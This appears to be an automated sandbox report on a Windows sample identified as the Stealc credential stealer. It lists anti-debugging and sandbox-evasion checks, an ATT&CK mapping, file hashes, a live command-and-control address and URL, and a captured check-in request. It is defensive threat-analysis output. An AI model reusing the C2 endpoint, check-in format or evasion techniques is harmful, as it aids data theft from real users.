                Source: file.exe, 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13554
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13557
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13608
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13568
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13576
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005445C0 VirtualProtect ?,00000004,00000100,000000000_2_005445C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00559860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00559860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00559750 mov eax, dword ptr fs:[00000030h]0_2_00559750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00557850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00557850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6652, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00559600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00559600
                Source: file.exe, file.exe, 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: q/SProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00557B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00556920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00556920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00557850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00557850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00557A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00557A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.540000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1824677690.000000000105E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1783006723.0000000004F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6652, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.540000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1824677690.000000000105E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1783006723.0000000004F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6652, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37=file.exe, 00000000.00000002.1824677690.00000000010B6000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.phpowsfile.exe, 00000000.00000002.1824677690.00000000010C7000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37/e2b1563c6670f193.php2file.exe, 00000000.00000002.1824677690.00000000010B6000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37file.exe, 00000000.00000002.1824677690.000000000105E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1824677690.00000000010B6000.00000004.00000020.00020000.00000000.sdmptrue
                      • URL Reputation: malware
                      		unknown
                      http://185.215.113.37/e2b1563c6670f193.php&file.exe, 00000000.00000002.1824677690.00000000010B6000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown
                        http://185.215.113.37/e2b1563c6670f193.phpYfile.exe, 00000000.00000002.1824677690.00000000010B6000.00000004.00000020.00020000.00000000.sdmptrue
                          		unknown
                          http://185.215.113.37/e2b1563c6670f193.phpgfile.exe, 00000000.00000002.1824677690.00000000010B6000.00000004.00000020.00020000.00000000.sdmptrue
                            		unknown
                            http://185.215.113.37Dfile.exe, 00000000.00000002.1824677690.000000000105E000.00000004.00000020.00020000.00000000.sdmptrue
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              185.215.113.37
                              		unknownPortugal
                              		206894WHOLESALECONNECTIONSNLtrue

                              General Information

                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1532109
                              Start date and time:2024-10-12 12:13:08 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 3m 20s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:3
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:file.exe
                              Detection:MAL
                              Classification:mal100.troj.evad.winEXE@1/0@0/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 80%
                              • Number of executed functions: 19
                              • Number of non-executed functions: 83
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Stop behavior analysis, all processes terminated

                              Warnings

                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, conhost.exe
                              • Excluded IPs from analysis (whitelisted): 4.175.87.197, 93.184.221.240
                              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, wu.azureedge.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                              • Not all processes where analyzed, report is missing behavior information

                              Simulations

                              Behavior and APIs

                              No simulations

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              oUbgeGwOL8.exeGet hashmaliciousLummaC, Amadey, StealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37/e2b1563c6670f193.php

                              Domains

                              No context

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37
                              oUbgeGwOL8.exeGet hashmaliciousLummaC, Amadey, StealcBrowse
                              • 185.215.113.103
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37
                              GGXhCiYFBw.exeGet hashmaliciousPhorpiex, XmrigBrowse
                              • 185.215.113.84
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              No created / dropped files found

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.947033342605635
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:file.exe
                              File size:1'825'792 bytes
                              MD5:ebddc57c042f9c28f78e5d1fa1c75020
                              SHA1:a3252e4609bde886ed5b96b72a439b18fe5bd9a4
                              SHA256:c6b0379b9b644a4d5c6cd89d57ace4f95810d31ebf2eb7b9d8310f88c04cfd85
                              SHA512:18cc68b453edd58be7364157a2e38da352654226ce8003683d865994574507ece9493590ed095d829a79c621e837ebb0d1d06be70e0963b636f01e1898c617b0
                              SSDEEP:49152:UrYeFtPvcHeff8z2fy8Gpp29b07fWZ3c6nh9tYBb7Of:UJBvyYfNfyZSPG
                              TLSH:B785331D8F285873E2B4C5F77675963FB6A23AC7648C02278C142B131EF73757A990A8
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                              File Icon

                              Icon Hash:90cececece8e8eb0

                              Static PE Info

                              General

                              Entrypoint:0xa8e000
                              Entrypoint Section:.taggant
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                              Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:2eabe9054cad5152567f0699947a2c5b

                              Entrypoint Preview

                              Instruction
                              jmp 00007FE83919627Ah

                              Rich Headers

                              Programming Language:
                              • [C++] VS2010 build 30319
                              • [ASM] VS2010 build 30319
                              • [ C ] VS2010 build 30319
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              • [LNK] VS2010 build 30319

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              0x10000x25b0000x2280045eca2cc3b73023889f22f2c1cbd20d3unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              0x25e0000x2970000x200f31f2f5d76ba193b95dc237bf18d4790unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              tjghrrql0x4f50000x1980000x197a0069a0f01f27ec7f6d9f43b1dba027dcd3False0.994973742716958data7.953395842513043IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              uavtyefl0x68d0000x10000x4006e6088ca10f58845dd80ac5c46f3d45eFalse0.7939453125data6.232929303714753IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .taggant0x68e0000x30000x22009aee11a2571a1f6a65071b273979186bFalse0.06066176470588235DOS executable (COM)0.7787182462113913IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                              Imports

                              DLLImport
                              kernel32.dlllstrcpy

                              Network Behavior

                              Suricata IDS Alerts

                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2024-10-12T12:14:15.743202+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730185.215.113.3780TCP

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Oct 12, 2024 12:14:14.777873039 CEST4973080192.168.2.4185.215.113.37
                              Oct 12, 2024 12:14:14.783503056 CEST8049730185.215.113.37192.168.2.4
                              Oct 12, 2024 12:14:14.787326097 CEST4973080192.168.2.4185.215.113.37
                              Oct 12, 2024 12:14:14.824424982 CEST4973080192.168.2.4185.215.113.37
                              Oct 12, 2024 12:14:14.829763889 CEST8049730185.215.113.37192.168.2.4
                              Oct 12, 2024 12:14:15.498428106 CEST8049730185.215.113.37192.168.2.4
                              Oct 12, 2024 12:14:15.498512983 CEST4973080192.168.2.4185.215.113.37
                              Oct 12, 2024 12:14:15.509524107 CEST4973080192.168.2.4185.215.113.37
                              Oct 12, 2024 12:14:15.514544964 CEST8049730185.215.113.37192.168.2.4
                              Oct 12, 2024 12:14:15.743125916 CEST8049730185.215.113.37192.168.2.4
                              Oct 12, 2024 12:14:15.743201971 CEST4973080192.168.2.4185.215.113.37
                              Oct 12, 2024 12:14:18.914571047 CEST4973080192.168.2.4185.215.113.37

                              HTTP Request Dependency Graph

                              • 185.215.113.37

                              HTTP Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.449730185.215.113.37806652C:\Users\user\Desktop\file.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 12:14:14.824424982 CEST89OUTGET / HTTP/1.1
                              Host: 185.215.113.37
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              Oct 12, 2024 12:14:15.498428106 CEST203INHTTP/1.1 200 OK
                              Date: Sat, 12 Oct 2024 10:14:15 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Content-Length: 0
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
                              Oct 12, 2024 12:14:15.509524107 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                              Content-Type: multipart/form-data; boundary=----CBKJJEHCBAKFBFHJKFBK
                              Host: 185.215.113.37
                              Content-Length: 211
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              Data Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 36 42 34 30 41 34 46 34 39 31 34 34 32 39 33 39 34 34 32 32 30 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 2d 2d 0d 0a
                              Data Ascii: ------CBKJJEHCBAKFBFHJKFBKContent-Disposition: form-data; name="hwid"A6B40A4F49144293944220------CBKJJEHCBAKFBFHJKFBKContent-Disposition: form-data; name="build"doma------CBKJJEHCBAKFBFHJKFBK--
                              Oct 12, 2024 12:14:15.743125916 CEST210INHTTP/1.1 200 OK
                              Date: Sat, 12 Oct 2024 10:14:15 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Content-Length: 8
                              Keep-Alive: timeout=5, max=99
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 59 6d 78 76 59 32 73 3d
                              Data Ascii: YmxvY2s=


                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              System Behavior

                              General

                              Target ID:0
                              Start time:06:14:09
                              Start date:12/10/2024
                              Path:C:\Users\user\Desktop\file.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\file.exe"
                              Imagebase:0x540000
                              File size:1'825'792 bytes
                              MD5 hash:EBDDC57C042F9C28F78E5D1FA1C75020
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1824677690.000000000105E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1783006723.0000000004F00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true

                              Disassembly

                              Reset < >

                                Execution Graph

                                Execution Coverage:8.4%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:9.7%
                                Total number of Nodes:2000
                                Total number of Limit Nodes:24
                                execution_graph 13399 5569f0 13444 542260 13399->13444 13423 556a64 13424 55a9b0 4 API calls 13423->13424 13425 556a6b 13424->13425 13426 55a9b0 4 API calls 13425->13426 13427 556a72 13426->13427 13428 55a9b0 4 API calls 13427->13428 13429 556a79 13428->13429 13430 55a9b0 4 API calls 13429->13430 13431 556a80 13430->13431 13596 55a8a0 13431->13596 13433 556a89 13434 556b0c 13433->13434 13437 556ac2 OpenEventA 13433->13437 13600 556920 GetSystemTime 13434->13600 13439 556af5 CloseHandle Sleep 13437->13439 13440 556ad9 13437->13440 13441 556b0a 13439->13441 13443 556ae1 CreateEventA 13440->13443 13441->13433 13443->13434 13797 5445c0 13444->13797 13446 542274 13447 5445c0 2 API calls 13446->13447 13448 54228d 13447->13448 13449 5445c0 2 API calls 13448->13449 13450 5422a6 13449->13450 13451 5445c0 2 API calls 13450->13451 13452 5422bf 13451->13452 13453 5445c0 2 API calls 13452->13453 13454 5422d8 13453->13454 13455 5445c0 2 API calls 13454->13455 13456 5422f1 13455->13456 13457 5445c0 2 API calls 13456->13457 13458 54230a 13457->13458 13459 5445c0 2 API calls 13458->13459 13460 542323 13459->13460 13461 5445c0 2 API calls 13460->13461 13462 54233c 13461->13462 13463 5445c0 2 API calls 13462->13463 13464 542355 13463->13464 13465 5445c0 2 API calls 13464->13465 13466 54236e 13465->13466 13467 5445c0 2 API calls 13466->13467 13468 542387 13467->13468 13469 5445c0 2 API calls 13468->13469 13470 5423a0 13469->13470 13471 5445c0 2 API calls 13470->13471 13472 5423b9 13471->13472 13473 5445c0 2 API calls 13472->13473 13474 5423d2 13473->13474 13475 5445c0 2 API calls 13474->13475 13476 5423eb 13475->13476 13477 5445c0 2 API calls 13476->13477 13478 542404 13477->13478 13479 5445c0 2 API calls 13478->13479 13480 54241d 13479->13480 13481 5445c0 2 API calls 13480->13481 13482 542436 13481->13482 13483 5445c0 2 API calls 13482->13483 13484 54244f 13483->13484 13485 5445c0 2 API calls 13484->13485 13486 542468 13485->13486 13487 5445c0 2 API calls 13486->13487 13488 542481 13487->13488 13489 5445c0 2 API calls 13488->13489 13490 54249a 13489->13490 13491 5445c0 2 API calls 13490->13491 13492 5424b3 13491->13492 13493 5445c0 2 API calls 13492->13493 13494 5424cc 13493->13494 13495 5445c0 2 API calls 13494->13495 13496 5424e5 13495->13496 13497 5445c0 2 API calls 13496->13497 13498 5424fe 13497->13498 13499 5445c0 2 API calls 13498->13499 13500 542517 13499->13500 13501 5445c0 2 API calls 13500->13501 13502 542530 13501->13502 13503 5445c0 2 API calls 13502->13503 13504 542549 13503->13504 13505 5445c0 2 API calls 13504->13505 13506 542562 13505->13506 13507 5445c0 2 API calls 13506->13507 13508 54257b 13507->13508 13509 5445c0 2 API calls 13508->13509 13510 542594 13509->13510 13511 5445c0 2 API calls 13510->13511 13512 5425ad 13511->13512 13513 5445c0 2 API calls 13512->13513 13514 5425c6 13513->13514 13515 5445c0 2 API calls 13514->13515 13516 5425df 13515->13516 13517 5445c0 2 API calls 13516->13517 13518 5425f8 13517->13518 13519 5445c0 2 API calls 13518->13519 13520 542611 13519->13520 13521 5445c0 2 API calls 13520->13521 13522 54262a 13521->13522 13523 5445c0 2 API calls 13522->13523 13524 542643 13523->13524 13525 5445c0 2 API calls 13524->13525 13526 54265c 13525->13526 13527 5445c0 2 API calls 13526->13527 13528 542675 13527->13528 13529 5445c0 2 API calls 13528->13529 13530 54268e 13529->13530 13531 559860 